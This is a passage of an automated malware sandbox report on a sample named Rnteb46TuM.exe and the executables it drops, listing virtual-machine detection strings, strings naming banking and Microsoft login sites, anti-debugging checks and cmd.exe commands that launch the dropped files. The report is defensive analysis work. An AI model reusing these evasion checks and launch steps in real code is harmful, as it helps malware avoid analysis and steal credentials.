Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: EBFBKFBG.0.dr Binary or memory string: discord.comVMware20,11696487552f
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: EBFBKFBG.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: EBFBKFBG.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A69000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.3339390181.00000000018F1000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.3339390181.00000000018B1000.00000004.00000020.00020000.00000000.sdmp, 6e6e496542.exe, 0000000C.00000002.2417828325.000000000176A000.00000004.00000020.00020000.00000000.sdmp, 6e6e496542.exe, 0000000C.00000002.2417828325.0000000001715000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: EBFBKFBG.0.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.6.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: EBFBKFBG.0.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: EBFBKFBG.0.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: EBFBKFBG.0.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: EBFBKFBG.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: EBFBKFBG.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: EBFBKFBG.0.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 6e6e496542.exe, 0000000C.00000002.2417828325.0000000001715000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr Binary or memory string: VMware VMCI Bus Device
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: EBFBKFBG.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: VMware, Inc.
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1hbin@
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: xVBoxService.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.6.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.6.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A28000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A05000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware'
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A69000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWY
Source: 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VBoxService.exe
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: Amcache.hve.6.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: EBFBKFBG.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VMWare
Source: Amcache.hve.6.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: EBFBKFBG.0.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: EBFBKFBG.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\Rnteb46TuM.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SIWVID
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Code function: 8_2_04F00D13 rdtsc 8_2_04F00D13
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7F5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C7F5FF0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7FC410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C7FC410
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F4643B mov eax, dword ptr fs:[00000030h] 10_2_00F4643B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F4A1A2 mov eax, dword ptr fs:[00000030h] 10_2_00F4A1A2
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7CB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C7CB66C
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7CB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C7CB1F7
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe"
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GCGHCBKFCF.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe "C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe"
